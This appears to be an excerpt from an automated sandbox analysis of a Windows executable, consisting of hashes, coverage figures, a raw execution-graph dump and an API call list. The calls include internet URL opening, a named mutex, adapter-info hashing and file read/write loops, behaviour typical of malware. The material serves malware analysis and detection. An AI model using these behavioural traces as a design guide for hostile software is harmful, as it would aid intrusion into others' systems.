                                                                                                        • Opcode Fuzzy Hash: b4853a2ad07067acaf4bca0184de09dcf27ae418265e5a28e2b7c5123b3be235
                                                                                                        • Instruction Fuzzy Hash: CB018F75A002009FD711DF08EC42E55B7E1AFC8710F154428F584CB352DB62EC559B95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:13.8%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:199
39741 f1b1d0 SysFreeString 39740->39741 39742 f1d4fd 39741->39742 39742->39738 39743 f1b140 60 API calls 39742->39743 39744 f1d5ae 39743->39744 39745 f1b1d0 SysFreeString 39744->39745 39746 f1d5d6 39745->39746 39746->39738 39747 f1b140 60 API calls 39746->39747 39748 f1d679 39747->39748 39749 f1b1d0 SysFreeString 39748->39749 39750 f1d6a1 39749->39750 39750->39738 39751 f1b140 60 API calls 39750->39751 39752 f1d6b6 39751->39752 39753 f1b1d0 SysFreeString 39752->39753 39754 f1d6de 39753->39754 39754->39738 39755 f1b140 60 API calls 39754->39755 39756 f1d707 39755->39756 39757 f1b1d0 SysFreeString 39756->39757 39758 f1d72f 39757->39758 39758->39738 39759 f1b140 60 API calls 39758->39759 39760 f1d744 39759->39760 39761 f1b1d0 SysFreeString 39760->39761 39762 f1d76c 39761->39762 39762->39738 40062 f33aaf GetSystemTimeAsFileTime 39762->40062 39764 f1d77d 40064 f33551 39764->40064 39769 f22c40 59 API calls 39770 f1d7b5 39769->39770 39771 f22900 60 API calls 39770->39771 39772 f1d7c3 39771->39772 39773 f1b140 60 API calls 39772->39773 39774 f1d7db 39773->39774 39775 f1b1d0 SysFreeString 39774->39775 39776 f1d7ff 39775->39776 39776->39738 39777 f1b140 60 API calls 39776->39777 39778 f1d8a3 39777->39778 39779 f1b1d0 SysFreeString 39778->39779 39780 f1d8cb 39779->39780 39780->39738 39781 f1b140 60 API calls 39780->39781 39782 f1d8ea 39781->39782 39783 f1b1d0 SysFreeString 39782->39783 39784 f1d912 39783->39784 39784->39738 40072 f1b400 SysAllocString 39784->40072 39786 f1d936 VariantInit VariantInit 39787 f1b140 60 API calls 39786->39787 39788 f1d985 39787->39788 39789 f1b1d0 SysFreeString 39788->39789 39790 f1d9e7 VariantClear VariantClear VariantClear 39789->39790 39791 f1da10 39790->39791 39793 f1da46 CoUninitialize 39790->39793 40076 f3052a 78 API calls vswprintf 39791->40076 39793->39719 40231 f1e670 39795->40231 39797 f1e79e 39798 f23ea0 59 API calls 39797->39798 39799 f1e7c3 39798->39799 39800 f23ff0 59 API calls 39799->39800 39801 f1e7ff 39800->39801 40257 f1e870 
39801->40257 39803 f1e806 39804 f23ff0 59 API calls 39803->39804 39805 f1e80d 39803->39805 39804->39805 39805->39417 40511 f23c40 39806->40511 39808 f2288c WideCharToMultiByte 40521 f284e0 39808->40521 39810 f228cf 39810->39423 39812 f2101a 39811->39812 39813 f2102b CryptCreateHash 39811->39813 40530 f40eca RaiseException 39812->40530 39814 f21056 lstrlenA CryptHashData 39813->39814 39815 f21045 39813->39815 39818 f2106e 39814->39818 39819 f2107f CryptGetHashParam 39814->39819 40531 f40eca RaiseException 39815->40531 40532 f40eca RaiseException 39818->40532 39821 f2109f 39819->39821 39823 f210b0 _memset 39819->39823 40533 f40eca RaiseException 39821->40533 39824 f210cf CryptGetHashParam 39823->39824 39825 f210e4 39824->39825 39826 f210f5 39824->39826 40534 f40eca RaiseException 39825->40534 39827 f30c62 _malloc 58 API calls 39826->39827 39829 f21105 _memset 39827->39829 39830 f21148 39829->39830 39831 f304a6 _sprintf 83 API calls 39829->39831 39832 f2114e CryptDestroyHash CryptReleaseContext 39830->39832 39833 f21133 lstrcatA 39831->39833 39832->39425 39833->39829 39833->39830 39835 f23a90 59 API calls 39834->39835 39836 f2294c MultiByteToWideChar 39835->39836 39837 f28400 59 API calls 39836->39837 39838 f2298d 39837->39838 39838->39444 39840 f23591 39839->39840 39841 f235d6 39839->39841 39840->39841 39842 f23597 39840->39842 39845 f235b7 39841->39845 40536 f24f70 59 API calls 39841->40536 39842->39845 40535 f24f70 59 API calls 39842->40535 39845->39463 39847 f22dfa 39846->39847 39848 f22dec 39846->39848 39851 f23ea0 59 API calls 39847->39851 39849 f23ea0 59 API calls 39848->39849 39850 f22df5 39849->39850 39850->39519 39852 f22e11 39851->39852 39852->39519 39854 f22c5f 39853->39854 39857 f22c71 39853->39857 39855 f256d0 59 API calls 39854->39855 39856 f22c6a 39855->39856 39856->39524 39858 f256d0 59 API calls 39857->39858 39859 f22c8a 39858->39859 39859->39524 39861 f23ff0 59 API calls 39860->39861 39862 f22c13 39861->39862 39863 f1ecb0 39862->39863 39865 f1ece5 
39863->39865 39866 f1eefc 39865->39866 40537 f31b3b 59 API calls 3 library calls 39865->40537 39866->39549 39867 f256d0 59 API calls 39869 f1ed6b _memmove 39867->39869 39868 f25230 59 API calls 39868->39869 39869->39866 39869->39867 39869->39868 40538 f31b3b 59 API calls 3 library calls 39869->40538 39872 f23742 39871->39872 39873 f236e7 39871->39873 39874 f2370d 39872->39874 40540 f24f70 59 API calls 39872->40540 39873->39872 39875 f236ed 39873->39875 39877 f2377f 39874->39877 39879 f24690 59 API calls 39874->39879 39875->39874 40539 f24f70 59 API calls 39875->40539 39880 f1ca70 39877->39880 39879->39877 39881 f1cb64 39880->39881 39884 f1caa3 39880->39884 39881->39532 39882 f1cb6b 40541 f5f26c 59 API calls 3 library calls 39882->40541 39884->39881 39884->39882 39886 f236c0 59 API calls 39884->39886 39885 f1cb75 39885->39532 39886->39884 39888 f24690 59 API calls 39887->39888 39889 f230d4 39888->39889 39890 f1c740 39889->39890 40542 f30fdd 39890->40542 39893 f1c944 CreateDirectoryW 39895 f30fdd 115 API calls 39893->39895 39900 f1c960 39895->39900 39896 f1c90e 39896->39893 39908 f1c96a 39896->39908 39897 f1c906 39898 f33a38 __fcloseall 83 API calls 39897->39898 39898->39896 39907 f328fd _fputws 82 API calls 39900->39907 39900->39908 39911 f1c9d5 39900->39911 39901 f1c79e _memmove 39901->39897 39910 f25c10 59 API calls 39901->39910 39912 f24f70 59 API calls 39901->39912 40572 f31101 76 API calls 5 library calls 39901->40572 40573 f30546 58 API calls __wcsnicmp 39901->40573 39907->39900 39908->39538 39910->39901 40545 f328fd 39911->40545 39912->39901 39914 f21223 GetFileSizeEx 39913->39914 39933 f21287 39913->39933 39915 f212a3 VirtualAlloc 39914->39915 39916 f21234 39914->39916 39918 f2131a CloseHandle 39915->39918 39922 f212c0 _memset 39915->39922 39916->39915 39917 f2123c CloseHandle 39916->39917 39919 f23100 59 API calls 39917->39919 39918->39541 39920 f21253 39919->39920 40805 f259d0 39920->40805 39925 f212e9 SetFilePointerEx 39922->39925 39957 f213a7 
39922->39957 39923 f213b7 SetFilePointer 39928 f213f5 ReadFile 39923->39928 39996 f215ae 39923->39996 39926 f21332 ReadFile 39925->39926 39927 f2130c VirtualFree 39925->39927 39926->39927 39929 f2134f 39926->39929 39927->39918 39930 f21440 39928->39930 39931 f2140f VirtualFree CloseHandle 39928->39931 39929->39927 39934 f21356 39929->39934 39937 f21471 lstrlenA 39930->39937 39938 f21718 lstrlenA 39930->39938 39930->39996 39935 f2142f 39931->39935 39932 f215c5 SetFilePointerEx 39932->39931 39936 f215df 39932->39936 39933->39541 39934->39923 39941 f22c40 59 API calls 39934->39941 39935->39541 39939 f215ed WriteFile 39936->39939 39943 f21602 39936->39943 40831 f30be4 39937->40831 39939->39931 39939->39943 39957->39923 39996->39932 39998->39544 40000 f2babb ShowWindow UpdateWindow 39999->40000 40001 f2bab9 39999->40001 40000->39546 40001->39546 40014->39331 40015->39367 40017 f21ad0 40016->40017 40018 f21af4 40016->40018 40019 f21afc 40017->40019 40020 f21adc DispatchMessageW PeekMessageW 40017->40020 40018->39373 40019->39373 40020->40017 40020->40018 40021->39374 40022->39517 40023->39549 40025 f23ff0 59 API calls 40024->40025 40026 f2303e 40025->40026 40026->39653 40029 f25d66 40028->40029 40030 f25dfe 40028->40030 40032 f26950 59 API calls 40029->40032 40037 f25d84 ___crtGetEnvironmentStringsW 40029->40037 40031 f5f23e 59 API calls 40030->40031 40033 f25e08 40031->40033 40034 f25d76 40032->40034 40035 f5f23e 59 API calls 40033->40035 40034->39671 40036 f25e1a 40035->40036 40036->39671 40037->39671 40038->39671 40040 f30241 40039->40040 40041 f302b6 40039->40041 40043 f35208 __wcsnicmp 58 API calls 40040->40043 40048 f30266 40040->40048 40050 f302c8 60 API calls 3 library calls 40041->40050 40045 f3024d 40043->40045 40044 f302c3 40044->39685 40049 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40045->40049 40047 f30258 40047->39685 40048->39685 40049->40047 40050->40044 40051->39712 40052->39711 40054 f33b4c 59 API calls 40053->40054 40055 f1b164 
40054->40055 40056 f1b177 SysAllocString 40055->40056 40057 f1b194 40055->40057 40056->40057 40057->39725 40059 f1b1de 40058->40059 40061 f1b202 40058->40061 40060 f1b1f5 SysFreeString 40059->40060 40059->40061 40060->40061 40061->39727 40063 f33add __aulldiv 40062->40063 40063->39764 40077 f4035d 40064->40077 40066 f3355a 40067 f1d78f 40066->40067 40085 f33576 40066->40085 40069 f328e0 40067->40069 40182 f3279f 40069->40182 40073 f1b423 40072->40073 40074 f1b41d 40072->40074 40075 f1b42d VariantClear 40073->40075 40074->39786 40075->39786 40076->39738 40078 f3501f __getptd_noexit 58 API calls 40077->40078 40079 f40363 40078->40079 40080 f40369 40079->40080 40082 f4038d 40079->40082 40118 f38cde 58 API calls 2 library calls 40079->40118 40081 f35208 __wcsnicmp 58 API calls 40080->40081 40080->40082 40083 f4036e 40081->40083 40082->40066 40083->40066 40086 f33591 40085->40086 40087 f335a9 _memset 40085->40087 40088 f35208 __wcsnicmp 58 API calls 40086->40088 40087->40086 40094 f335c0 40087->40094 40089 f33596 40088->40089 40127 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40089->40127 40091 f335cb 40093 f35208 __wcsnicmp 58 API calls 40091->40093 40092 f335e9 40119 f3fb64 40092->40119 40117 f335a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 40093->40117 40094->40091 40094->40092 40096 f335ee 40128 f3f803 58 API calls __wcsnicmp 40096->40128 40098 f335f7 40099 f337e5 40098->40099 40129 f3f82d 58 API calls __wcsnicmp 40098->40129 40142 f342fd 8 API calls 2 library calls 40099->40142 40102 f33609 40102->40099 40130 f3f857 40102->40130 40103 f337ef 40105 f3361b 40105->40099 40106 f33624 40105->40106 40107 f3369b 40106->40107 40109 f33637 40106->40109 40140 f3f939 58 API calls 4 library calls 40107->40140 40137 f3f939 58 API calls 4 library calls 40109->40137 40110 f336a2 40110->40117 40141 f3fbb4 58 API calls 4 library calls 40110->40141 40112 f3364f 40112->40117 40138 f3fbb4 58 API calls 4 library calls 40112->40138 40115 f33668 40115->40117 40139 
f3f939 58 API calls 4 library calls 40115->40139 40117->40067 40118->40080 40121 f3fb70 _flsall 40119->40121 40120 f3fba5 _flsall 40120->40096 40121->40120 40122 f38af7 __lock 58 API calls 40121->40122 40123 f3fb80 40122->40123 40124 f3fb93 40123->40124 40143 f3fe47 40123->40143 40172 f3fbab LeaveCriticalSection _doexit 40124->40172 40127->40117 40128->40098 40129->40102 40131 f3f861 40130->40131 40132 f3f876 40130->40132 40133 f35208 __wcsnicmp 58 API calls 40131->40133 40132->40105 40134 f3f866 40133->40134 40181 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40134->40181 40136 f3f871 40136->40105 40137->40112 40138->40115 40139->40117 40140->40110 40141->40117 40142->40103 40144 f3fe53 _flsall 40143->40144 40145 f38af7 __lock 58 API calls 40144->40145 40146 f3fe71 _W_expandtime 40145->40146 40147 f3f857 __tzset_nolock 58 API calls 40146->40147 40148 f3fe86 40147->40148 40163 f3ff25 __tzset_nolock __isindst_nolock 40148->40163 40173 f3f803 58 API calls __wcsnicmp 40148->40173 40151 f3fe98 40151->40163 40174 f3f82d 58 API calls __wcsnicmp 40151->40174 40152 f3ff71 GetTimeZoneInformation 40152->40163 40153 f30bed _free 58 API calls 40153->40163 40155 f3feaa 40155->40163 40175 f43f99 58 API calls 2 library calls 40155->40175 40157 f3ffd8 WideCharToMultiByte 40157->40163 40158 f3feb8 40176 f51667 78 API calls 3 library calls 40158->40176 40159 f40010 WideCharToMultiByte 40159->40163 40162 f3ff0c _strlen 40177 f38cde 58 API calls 2 library calls 40162->40177 40163->40152 40163->40153 40163->40157 40163->40159 40164 f40157 __tzset_nolock _flsall __isindst_nolock 40163->40164 40170 f4ff8e 58 API calls __tzset_nolock 40163->40170 40171 f33c2d 61 API calls UnDecorator::getZName 40163->40171 40179 f342fd 8 API calls 2 library calls 40163->40179 40180 f400d7 LeaveCriticalSection _doexit 40163->40180 40164->40124 40166 f3fed9 _is_exception_typeof 40166->40162 40166->40163 40167 f30bed _free 58 API calls 40166->40167 40167->40162 40168 f3ff1a _strlen 40168->40163 
40178 f3c0fd 58 API calls __wcsnicmp 40168->40178 40170->40163 40171->40163 40172->40120 40173->40151 40174->40155 40175->40158 40176->40166 40177->40168 40178->40163 40179->40163 40180->40163 40181->40136 40209 f3019c 40182->40209 40185 f327d4 40186 f35208 __wcsnicmp 58 API calls 40185->40186 40187 f327d9 40186->40187 40217 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40187->40217 40188 f327e9 MultiByteToWideChar 40190 f32815 40188->40190 40191 f32804 GetLastError 40188->40191 40219 f38cde 58 API calls 2 library calls 40190->40219 40218 f351e7 58 API calls 3 library calls 40191->40218 40194 f3281d 40195 f32825 MultiByteToWideChar 40194->40195 40208 f32810 40194->40208 40195->40191 40196 f3283f 40195->40196 40220 f38cde 58 API calls 2 library calls 40196->40220 40197 f30bed _free 58 API calls 40198 f328a0 40197->40198 40200 f30bed _free 58 API calls 40198->40200 40202 f1d7a3 40200->40202 40201 f3284a 40201->40208 40221 f3d51e 88 API calls 3 library calls 40201->40221 40202->39769 40204 f32866 40205 f3286f WideCharToMultiByte 40204->40205 40204->40208 40206 f3288b GetLastError 40205->40206 40205->40208 40222 f351e7 58 API calls 3 library calls 40206->40222 40208->40197 40210 f301fa 40209->40210 40211 f301ad 40209->40211 40210->40185 40210->40188 40223 f35007 40211->40223 40213 f301b3 40214 f301da 40213->40214 40228 f345dc 58 API calls 6 library calls 40213->40228 40214->40210 40229 f3495e 58 API calls 6 library calls 40214->40229 40217->40202 40218->40208 40219->40194 40220->40201 40221->40204 40222->40208 40224 f3501f __getptd_noexit 58 API calls 40223->40224 40225 f3500d 40224->40225 40227 f3501a 40225->40227 40230 f37c2e 58 API calls 3 library calls 40225->40230 40227->40213 40228->40214 40229->40210 40232 f30c62 _malloc 58 API calls 40231->40232 40233 f1e684 40232->40233 40234 f30c62 _malloc 58 API calls 40233->40234 40235 f1e690 40234->40235 40236 f1e6b4 GetAdaptersInfo 40235->40236 40237 f1e699 40235->40237 40239 f1e6c4 40236->40239 40240 f1e6db 
GetAdaptersInfo 40236->40240 40238 f31f2d _wprintf 85 API calls 40237->40238 40243 f1e6a3 40238->40243 40244 f30bed _free 58 API calls 40239->40244 40241 f1e741 40240->40241 40242 f1e6ea 40240->40242 40247 f30bed _free 58 API calls 40241->40247 40281 f304a6 40242->40281 40246 f30bed _free 58 API calls 40243->40246 40248 f1e6ca 40244->40248 40250 f1e6a9 40246->40250 40251 f1e74a 40247->40251 40252 f30c62 _malloc 58 API calls 40248->40252 40250->39797 40251->39797 40254 f1e6d2 40252->40254 40254->40237 40254->40240 40255 f1e737 40256 f31f2d _wprintf 85 API calls 40255->40256 40256->40241 40258 f256d0 59 API calls 40257->40258 40259 f1e8bb CryptAcquireContextW 40258->40259 40260 f1e8e9 CryptCreateHash 40259->40260 40261 f1e8d8 40259->40261 40263 f1e903 40260->40263 40264 f1e914 CryptHashData 40260->40264 40506 f40eca RaiseException 40261->40506 40507 f40eca RaiseException 40263->40507 40266 f1e943 CryptGetHashParam 40264->40266 40267 f1e932 40264->40267 40269 f1e963 40266->40269 40271 f1e974 _memset 40266->40271 40508 f40eca RaiseException 40267->40508 40509 f40eca RaiseException 40269->40509 40272 f1e993 CryptGetHashParam 40271->40272 40273 f1e9a8 40272->40273 40279 f1e9b9 40272->40279 40510 f40eca RaiseException 40273->40510 40275 f1ea10 40277 f1ea16 CryptDestroyHash CryptReleaseContext 40275->40277 40276 f304a6 _sprintf 83 API calls 40276->40279 40278 f1ea33 40277->40278 40278->39803 40279->40275 40279->40276 40280 f23ea0 59 API calls 40279->40280 40280->40279 40282 f304c2 40281->40282 40283 f304d7 40281->40283 40285 f35208 __wcsnicmp 58 API calls 40282->40285 40283->40282 40284 f304de 40283->40284 40310 f36ab6 40284->40310 40286 f304c7 40285->40286 40309 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40286->40309 40289 f30504 40290 f1e725 40289->40290 40334 f364ef 78 API calls 5 library calls 40289->40334 40292 f31f2d 40290->40292 40293 f31f39 _flsall 40292->40293 40294 f31f4a 40293->40294 40295 f31f5f __flsbuf 40293->40295 40296 f35208 __wcsnicmp 58 API 
calls 40294->40296 40354 f30e92 40295->40354 40297 f31f4f 40296->40297 40370 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40297->40370 40300 f31f6f __flsbuf 40359 f3afd2 40300->40359 40301 f31f5a _flsall 40301->40255 40303 f31f82 __flsbuf 40304 f36ab6 __output_l 83 API calls 40303->40304 40305 f31f9b __flsbuf 40304->40305 40366 f3afa1 40305->40366 40309->40290 40311 f3019c _LocaleUpdate::_LocaleUpdate 58 API calls 40310->40311 40312 f36b2b 40311->40312 40313 f35208 __wcsnicmp 58 API calls 40312->40313 40314 f36b30 40313->40314 40315 f37601 40314->40315 40328 f36b50 __aulldvrm __woutput_s_l _strlen 40314->40328 40342 f3816b 40314->40342 40316 f35208 __wcsnicmp 58 API calls 40315->40316 40317 f37606 40316->40317 40351 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40317->40351 40319 f375db 40335 f3a77e 40319->40335 40322 f375fd 40322->40289 40324 f3766a 78 API calls _write_string 40324->40328 40325 f371b9 DecodePointer 40325->40328 40326 f30bed _free 58 API calls 40326->40328 40327 f376de 78 API calls _write_string 40327->40328 40328->40315 40328->40319 40328->40324 40328->40325 40328->40326 40328->40327 40329 f4adf7 60 API calls __cftof 40328->40329 40331 f3721c DecodePointer 40328->40331 40332 f376b2 78 API calls _write_multi_char 40328->40332 40333 f37241 DecodePointer 40328->40333 40349 f32bcc 58 API calls _LocaleUpdate::_LocaleUpdate 40328->40349 40350 f38cde 58 API calls 2 library calls 40328->40350 40329->40328 40331->40328 40332->40328 40333->40328 40334->40290 40336 f3a786 40335->40336 40337 f3a788 IsProcessorFeaturePresent 40335->40337 40336->40322 40339 f3ab9c 40337->40339 40352 f3ab4b 5 API calls ___raise_securityfailure 40339->40352 40341 f3ac7f 40341->40322 40343 f38175 40342->40343 40344 f3818a 40342->40344 40345 f35208 __wcsnicmp 58 API calls 40343->40345 40344->40328 40346 f3817a 40345->40346 40353 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40346->40353 40348 f38185 40348->40328 40349->40328 40350->40328 40351->40319 
40352->40341 40353->40348 40355 f30eb3 EnterCriticalSection 40354->40355 40356 f30e9d 40354->40356 40355->40300 40357 f38af7 __lock 58 API calls 40356->40357 40358 f30ea6 40357->40358 40358->40300 40360 f3816b __flsbuf 58 API calls 40359->40360 40361 f3afdf 40360->40361 40372 f489c2 40361->40372 40363 f3afe5 __flsbuf 40364 f3b034 40363->40364 40381 f38cde 58 API calls 2 library calls 40363->40381 40364->40303 40367 f3afaa 40366->40367 40368 f31faf 40366->40368 40367->40368 40383 f3836b 40367->40383 40371 f31fc9 LeaveCriticalSection LeaveCriticalSection __flsbuf __getstream 40368->40371 40370->40301 40371->40301 40373 f489cd 40372->40373 40374 f489da 40372->40374 40375 f35208 __wcsnicmp 58 API calls 40373->40375 40377 f489e6 40374->40377 40378 f35208 __wcsnicmp 58 API calls 40374->40378 40376 f489d2 40375->40376 40376->40363 40377->40363 40379 f48a07 40378->40379 40382 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40379->40382 40381->40364 40382->40376 40384 f3837e 40383->40384 40388 f383a2 40383->40388 40385 f3816b __flsbuf 58 API calls 40384->40385 40384->40388 40386 f3839b 40385->40386 40389 f3df14 40386->40389 40388->40368 40390 f3df20 _flsall 40389->40390 40391 f3df2d 40390->40391 40393 f3df44 40390->40393 40489 f351d4 58 API calls __getptd_noexit 40391->40489 40392 f3dfe3 40493 f351d4 58 API calls __getptd_noexit 40392->40493 40393->40392 40395 f3df58 40393->40395 40398 f3df80 40395->40398 40399 f3df76 40395->40399 40397 f3df32 40401 f35208 __wcsnicmp 58 API calls 40397->40401 40417 f4b134 40398->40417 40490 f351d4 58 API calls __getptd_noexit 40399->40490 40400 f3df7b 40405 f35208 __wcsnicmp 58 API calls 40400->40405 40412 f3df39 _flsall 40401->40412 40404 f3df86 40406 f3df99 40404->40406 40407 f3dfac 40404->40407 40408 f3dfef 40405->40408 40426 f3e003 40406->40426 40411 f35208 __wcsnicmp 58 API calls 40407->40411 40494 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40408->40494 40414 f3dfb1 40411->40414 40412->40388 40413 f3dfa5 40492 f3dfdb 
LeaveCriticalSection __unlock_fhandle 40413->40492 40491 f351d4 58 API calls __getptd_noexit 40414->40491 40418 f4b140 _flsall 40417->40418 40419 f4b18f EnterCriticalSection 40418->40419 40420 f38af7 __lock 58 API calls 40418->40420 40421 f4b1b5 _flsall 40419->40421 40422 f4b165 40420->40422 40421->40404 40423 f4b17d 40422->40423 40495 f4263e InitializeCriticalSectionAndSpinCount 40422->40495 40496 f4b1b9 LeaveCriticalSection _doexit 40423->40496 40427 f3e010 __ftell_nolock 40426->40427 40428 f3e04f 40427->40428 40429 f3e06e 40427->40429 40457 f3e044 40427->40457 40497 f351d4 58 API calls __getptd_noexit 40428->40497 40432 f3e0c6 40429->40432 40433 f3e0aa 40429->40433 40430 f3a77e __fltin2 6 API calls 40434 f3e864 40430->40434 40437 f3e0df 40432->40437 40501 f3f744 60 API calls 3 library calls 40432->40501 40499 f351d4 58 API calls __getptd_noexit 40433->40499 40434->40413 40435 f3e054 40438 f35208 __wcsnicmp 58 API calls 40435->40438 40439 f489c2 __flsbuf 58 API calls 40437->40439 40442 f3e05b 40438->40442 40443 f3e0ed 40439->40443 40440 f3e0af 40444 f35208 __wcsnicmp 58 API calls 40440->40444 40498 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40442->40498 40446 f3e446 40443->40446 40451 f35007 ___CxxUnregisterExceptionObject 58 API calls 40443->40451 40447 f3e0b6 40444->40447 40448 f3e464 40446->40448 40449 f3e7d9 WriteFile 40446->40449 40500 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40447->40500 40452 f3e588 40448->40452 40460 f3e47a 40448->40460 40453 f3e439 GetLastError 40449->40453 40482 f3e678 40449->40482 40454 f3e119 GetConsoleMode 40451->40454 40465 f3e67d 40452->40465 40467 f3e593 40452->40467 40458 f3e406 40453->40458 40454->40446 40456 f3e158 40454->40456 40455 f3e812 40455->40457 40462 f35208 __wcsnicmp 58 API calls 40455->40462 40456->40446 40459 f3e168 GetConsoleCP 40456->40459 40457->40430 40458->40455 40458->40457 40464 f3e566 40458->40464 40459->40455 40466 f3e197 40459->40466 40460->40455 40460->40458 40461 f3e4e9 
WriteFile 40460->40461 40461->40453 40461->40460 40463 f3e840 40462->40463 40505 f351d4 58 API calls __getptd_noexit 40463->40505 40469 f3e571 40464->40469 40470 f3e809 40464->40470 40465->40455 40471 f3e6f2 WideCharToMultiByte 40465->40471 40466->40458 40483 f4c76c 60 API calls __putch_nolock 40466->40483 40484 f3e280 WideCharToMultiByte 40466->40484 40487 f3e2ed 40466->40487 40502 f32d33 58 API calls __isleadbyte_l 40466->40502 40467->40455 40472 f3e5f8 WriteFile 40467->40472 40474 f35208 __wcsnicmp 58 API calls 40469->40474 40504 f351e7 58 API calls 3 library calls 40470->40504 40471->40453 40481 f3e739 40471->40481 40472->40453 40473 f3e647 40472->40473 40473->40458 40473->40467 40473->40482 40476 f3e576 40474->40476 40503 f351d4 58 API calls __getptd_noexit 40476->40503 40477 f3e741 WriteFile 40480 f3e794 GetLastError 40477->40480 40477->40481 40480->40481 40481->40458 40481->40465 40481->40477 40481->40482 40482->40458 40483->40466 40484->40458 40485 f3e2bb WriteFile 40484->40485 40485->40453 40485->40487 40486 f5058c WriteConsoleW CreateFileW __putwch_nolock 40486->40487 40487->40453 40487->40458 40487->40466 40487->40486 40488 f3e315 WriteFile 40487->40488 40488->40453 40488->40487 40489->40397 40490->40400 40491->40413 40492->40412 40493->40400 40494->40412 40495->40423 40496->40419 40497->40435 40498->40457 40499->40440 40500->40457 40501->40437 40502->40466 40503->40457 40504->40457 40505->40457 40506->40260 40507->40264 40508->40266 40509->40271 40510->40279 40512 f23c62 40511->40512 40513 f23c74 _memset 40511->40513 40514 f23c96 40512->40514 40515 f23c67 40512->40515 40513->39808 40517 f5f23e 59 API calls 40514->40517 40516 f33b4c 59 API calls 40515->40516 40518 f23c6d 40516->40518 40517->40518 40518->40513 40528 f5f1bb 59 API calls 3 library calls 40518->40528 40522 f28513 40521->40522 40525 f28520 40521->40525 40522->40525 40529 f25810 59 API calls ___crtGetEnvironmentStringsW 40522->40529 40523 f28619 40523->39810 40525->40523 40526 f5f23e 59 API 
calls 40525->40526 40527 f26760 59 API calls 40525->40527 40526->40525 40527->40525 40529->40525 40530->39813 40531->39814 40532->39819 40533->39823 40534->39826 40535->39845 40536->39845 40537->39869 40538->39869 40539->39874 40540->39874 40541->39885 40574 f31037 40542->40574 40544 f1c78a 40544->39896 40571 f30546 58 API calls __wcsnicmp 40544->40571 40546 f32909 _flsall 40545->40546 40547 f3291c 40546->40547 40548 f32941 __W_Gettnames_l 40546->40548 40549 f35208 __wcsnicmp 58 API calls 40547->40549 40776 f30e53 40548->40776 40550 f32921 40549->40550 40775 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40550->40775 40553 f3292c _flsall 40554 f32950 40571->39901 40572->39901 40573->39901 40577 f31043 _flsall 40574->40577 40575 f31056 40576 f35208 __wcsnicmp 58 API calls 40575->40576 40578 f3105b 40576->40578 40577->40575 40579 f31087 40577->40579 40623 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40578->40623 40593 f38df4 40579->40593 40582 f3108c 40583 f310a2 40582->40583 40584 f31095 40582->40584 40585 f310cc 40583->40585 40586 f310ac 40583->40586 40587 f35208 __wcsnicmp 58 API calls 40584->40587 40608 f38f13 40585->40608 40588 f35208 __wcsnicmp 58 API calls 40586->40588 40590 f31066 _flsall @_EH4_CallFilterFunc@8 40587->40590 40588->40590 40590->40544 40594 f38e00 _flsall 40593->40594 40595 f38af7 __lock 58 API calls 40594->40595 40606 f38e0e 40595->40606 40596 f38e82 40625 f38f0a 40596->40625 40597 f38e89 40629 f38cde 58 API calls 2 library calls 40597->40629 40600 f38e90 40600->40596 40630 f4263e InitializeCriticalSectionAndSpinCount 40600->40630 40601 f38eff _flsall 40601->40582 40603 f38b9f __mtinitlocknum 58 API calls 40603->40606 40604 f30e92 _flsall 59 API calls 40604->40606 40605 f38eb6 EnterCriticalSection 40605->40596 40606->40596 40606->40597 40606->40603 40606->40604 40628 f30efc LeaveCriticalSection LeaveCriticalSection _doexit 40606->40628 40617 f38f33 __wsetlocale_nolock 40608->40617 40609 f38f4d 40610 f35208 __wcsnicmp 58 API 
APIs
  • Part of subcall function 00F1CF10: _memset.LIBCMT ref: 00F1CF4A
  • Part of subcall function 00F1CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F1CF5F
  • Part of subcall function 00F1CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1CFA6
• GetCurrentProcess.KERNEL32 ref: 00F29FC4
• GetLastError.KERNEL32 ref: 00F29FD2
• SetPriorityClass.KERNEL32(00000000,00000080), ref: 00F29FDA
• GetLastError.KERNEL32 ref: 00F29FE4
• GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0084C0D0,?), ref: 00F2A0BB
• PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2A0C2
• GetCommandLineW.KERNEL32(?,?), ref: 00F2A161
  • Part of subcall function 00F224E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F224FE
  • Part of subcall function 00F224E0: GetLastError.KERNEL32 ref: 00F22509
  • Part of subcall function 00F224E0: CloseHandle.KERNEL32 ref: 00F2251C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
